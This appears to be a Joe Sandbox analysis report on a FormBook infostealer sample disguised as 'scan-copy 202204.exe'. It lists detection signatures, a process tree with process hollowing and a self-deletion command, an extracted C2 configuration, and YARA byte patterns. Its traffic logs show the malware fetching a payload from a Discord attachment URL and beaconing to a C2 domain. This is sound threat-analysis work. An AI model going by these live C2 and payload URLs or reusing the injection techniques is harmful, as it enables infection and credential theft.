Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
scan-copy 202204.exe

Overview

General Information

Sample Name:scan-copy 202204.exe
Analysis ID:612083
MD5:ce536566bed415b6be2b7635cfb03af0
SHA1:0845827e4dd7ab05ea5faeda57b93f2912fb04fe
SHA256:8722d6807e6c18d74f0c1ebea1f10d4f82038985b553917b2a6df36745299ed2
Tags:exeFormbookxloader
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • scan-copy 202204.exe (PID: 6328 cmdline: "C:\Users\user\Desktop\scan-copy 202204.exe" MD5: CE536566BED415B6BE2B7635CFB03AF0)
    • cmd.exe (PID: 7160 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 10 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 2232 cmdline: timeout 10 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • scan-copy 202204.exe (PID: 6444 cmdline: C:\Users\user\Desktop\scan-copy 202204.exe MD5: CE536566BED415B6BE2B7635CFB03AF0)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6384 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6672 cmdline: /c del "C:\Users\user\Desktop\scan-copy 202204.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.tenacityshipping.com/s59h/"], "decoy": ["2028my.icu", "svijet-zastite.com", "zwinz.store", "munixc.info", "falcongroupmanagement.com", "aerionsys.com", "hvbatterystore.com", "guidedleveledreading.com", "dayral-review.com", "globalethinvest.com", "mobilecoin.art", "routetree4life.com", "mas-traders.com", "helioolson.com", "hrbwanjinda.com", "tangerinesafe.com", "gabriellemariaphotos.com", "uuckpp.com", "fzshangmao.net", "wanwuchuangyi.com", "insurewithsfg.com", "throwpillowco.com", "whphllc.com", "cndh335.com", "172pelleport.paris", "fuckingharder.com", "avernoon.art", "numatachuo-rc.com", "fogelsingleywedding.com", "lkhomedevelopment.com", "yueoo.info", "paohuangfilms.com", "eacente.info", "yanhuige.com", "xiyuganguo.com", "drutoshebabd.com", "heimeasure.xyz", "efatebejo.xyz", "sjpestcontroller.com", "jid-studio.com", "eoscleaner.com", "idetechco.com", "yyjlzm.com", "staneinvest.com", "flameys.com", "brickstoneinvestmentltd.com", "dicechess.website", "allgamescracked.com", "yuuhaisin.com", "juvearoma.com", "damancavexclusive.com", "everydayanarchism.com", "cicisolutions.host", "dpfibras.com", "anudessk.info", "onszfitness.com", "dlino.online", "thelocalmarketrealestate.com", "eco-friendly.one", "bacnebuster.com", "sparagussolutions.com", "advertising-creations.com", "joanthemoneymentor.com", "cqgongzuotai.com"]}
SourceRuleDescriptionAuthorStrings
scan-copy 202204.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x1f87:$x1: https://cdn.discordapp.com/attachments/
scan-copy 202204.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9348:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x96e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x153f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14ee1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x154f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1566f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa0fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1415c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xae72:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1a8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1b98a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x17819:$sqlite3step: 68 34 1C 7B E1
      • 0x1792c:$sqlite3step: 68 34 1C 7B E1
      • 0x17848:$sqlite3text: 68 38 2A 90 C5
      • 0x1796d:$sqlite3text: 68 38 2A 90 C5
      • 0x1785b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17983:$sqlite3blob: 68 53 D8 7F 8C
      0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 34 entries
        SourceRuleDescriptionAuthorStrings
        15.0.scan-copy 202204.exe.860000.2.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
        • 0x1f87:$x1: https://cdn.discordapp.com/attachments/
        15.0.scan-copy 202204.exe.860000.2.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          15.0.scan-copy 202204.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            15.0.scan-copy 202204.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            15.0.scan-copy 202204.exe.400000.4.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
            • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
            • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
            • 0x15d18:$sqlite3text: 68 38 2A 90 C5
            • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
            • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
            • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
            Click to see the 40 entries

            There are no malicious signatures, click here to show all signatures.

            Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3968, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6384, ProcessName: msdt.exe
            Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\Desktop\scan-copy 202204.exe, CommandLine: C:\Users\user\Desktop\scan-copy 202204.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\scan-copy 202204.exe, NewProcessName: C:\Users\user\Desktop\scan-copy 202204.exe, OriginalFileName: C:\Users\user\Desktop\scan-copy 202204.exe, ParentCommandLine: "C:\Users\user\Desktop\scan-copy 202204.exe" , ParentImage: C:\Users\user\Desktop\scan-copy 202204.exe, ParentProcessId: 6328, ParentProcessName: scan-copy 202204.exe, ProcessCommandLine: C:\Users\user\Desktop\scan-copy 202204.exe, ProcessId: 6444, ProcessName: scan-copy 202204.exe
            Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c timeout 10, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7160, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 992, ProcessName: conhost.exe
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.tenacityshipping.com/s59h/"], "decoy": ["2028my.icu", "svijet-zastite.com", "zwinz.store", "munixc.info", "falcongroupmanagement.com", "aerionsys.com", "hvbatterystore.com", "guidedleveledreading.com", "dayral-review.com", "globalethinvest.com", "mobilecoin.art", "routetree4life.com", "mas-traders.com", "helioolson.com", "hrbwanjinda.com", "tangerinesafe.com", "gabriellemariaphotos.com", "uuckpp.com", "fzshangmao.net", "wanwuchuangyi.com", "insurewithsfg.com", "throwpillowco.com", "whphllc.com", "cndh335.com", "172pelleport.paris", "fuckingharder.com", "avernoon.art", "numatachuo-rc.com", "fogelsingleywedding.com", "lkhomedevelopment.com", "yueoo.info", "paohuangfilms.com", "eacente.info", "yanhuige.com", "xiyuganguo.com", "drutoshebabd.com", "heimeasure.xyz", "efatebejo.xyz", "sjpestcontroller.com", "jid-studio.com", "eoscleaner.com", "idetechco.com", "yyjlzm.com", "staneinvest.com", "flameys.com", "brickstoneinvestmentltd.com", "dicechess.website", "allgamescracked.com", "yuuhaisin.com", "juvearoma.com", "damancavexclusive.com", "everydayanarchism.com", "cicisolutions.host", "dpfibras.com", "anudessk.info", "onszfitness.com", "dlino.online", "thelocalmarketrealestate.com", "eco-friendly.one", "bacnebuster.com", "sparagussolutions.com", "advertising-creations.com", "joanthemoneymentor.com", "cqgongzuotai.com"]}
            Source: scan-copy 202204.exeVirustotal: Detection: 30%Perma Link
            Source: scan-copy 202204.exeReversingLabs: Detection: 14%
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.scan-copy 202204.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.scan-copy 202204.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: scan-copy 202204.exeJoe Sandbox ML: detected
            Source: 15.0.scan-copy 202204.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 15.0.scan-copy 202204.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 15.0.scan-copy 202204.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 15.2.scan-copy 202204.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: scan-copy 202204.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49742 version: TLS 1.2
            Source: scan-copy 202204.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: msdt.pdbGCTL source: scan-copy 202204.exe, 0000000F.00000002.421704804.00000000031C0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: scan-copy 202204.exe, 0000000F.00000002.420091467.000000000141F000.00000040.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 0000000F.00000002.418886183.0000000001300000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000012.00000002.525919808.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000012.00000002.527450554.0000000004E2F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: scan-copy 202204.exe, scan-copy 202204.exe, 0000000F.00000002.420091467.000000000141F000.00000040.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 0000000F.00000002.418886183.0000000001300000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000012.00000002.525919808.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000012.00000002.527450554.0000000004E2F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: msdt.pdb source: scan-copy 202204.exe, 0000000F.00000002.421704804.00000000031C0000.00000040.10000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 4x nop then pop edi
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi

            Networking

            barindex
            Source: C:\Windows\explorer.exeDomain query: www.eco-friendly.one
            Source: C:\Windows\explorer.exeNetwork Connect: 198.54.114.195 80
            Source: C:\Windows\explorer.exeDomain query: www.brickstoneinvestmentltd.com
            Source: Yara matchFile source: scan-copy 202204.exe, type: SAMPLE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.860000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.860000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.860000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.860000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.msdt.exe.524796c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.scan-copy 202204.exe.860000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.860000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.860000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.860000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.scan-copy 202204.exe.cc0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.msdt.exe.d26668.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.scan-copy 202204.exe.cc0000.0.unpack, type: UNPACKEDPE
            Source: Malware configuration extractorURLs: www.tenacityshipping.com/s59h/
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET /attachments/964082530275954728/966271154442612776/Usevbg_Pzmwkikx.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /s59h/?gPt=J9yIbbq2JC4kGJ28zSLAHEMUc2712/mbh0KUqSU+6gyJcm/2qQQ0g7MEmxyaj1IcJpiC&wTOHf=8pqLRLgpXn9D HTTP/1.1Host: www.brickstoneinvestmentltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
            Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: scan-copy 202204.exe, 00000000.00000002.349221801.00000000014A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: scan-copy 202204.exe, 00000000.00000002.349702121.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: scan-copy 202204.exe, 00000000.00000002.349702121.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
            Source: scan-copy 202204.exeString found in binary or memory: https://cdn.discordapp.com/attachments/964082530275954728/966271154442612776/Usevbg_Pzmwkikx.bmp
            Source: scan-copy 202204.exe, 00000000.00000002.349702121.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/964082530275954728/966271154442612776/Usevbg_Pzmwkikx.bmpt%0l
            Source: scan-copy 202204.exe, 00000000.00000002.349938512.000000000322A000.00000004.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 00000000.00000002.349788764.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
            Source: scan-copy 202204.exe, 00000000.00000002.349938512.000000000322A000.00000004.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 00000000.00000002.349788764.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
            Source: scan-copy 202204.exe, 00000000.00000002.349938512.000000000322A000.00000004.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 00000000.00000002.349788764.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
            Source: msdt.exe, 00000012.00000002.528983601.00000000053C2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.brickstoneinvestmentltd.com/s59h/?gPt=J9yIbbq2JC4kGJ28zSLAHEMUc2712/mbh0KUqSU
            Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
            Source: global trafficHTTP traffic detected: GET /attachments/964082530275954728/966271154442612776/Usevbg_Pzmwkikx.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /s59h/?gPt=J9yIbbq2JC4kGJ28zSLAHEMUc2712/mbh0KUqSU+6gyJcm/2qQQ0g7MEmxyaj1IcJpiC&wTOHf=8pqLRLgpXn9D HTTP/1.1Host: www.brickstoneinvestmentltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49742 version: TLS 1.2
            Source: scan-copy 202204.exe, 00000000.00000002.349136480.0000000001460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.scan-copy 202204.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.scan-copy 202204.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
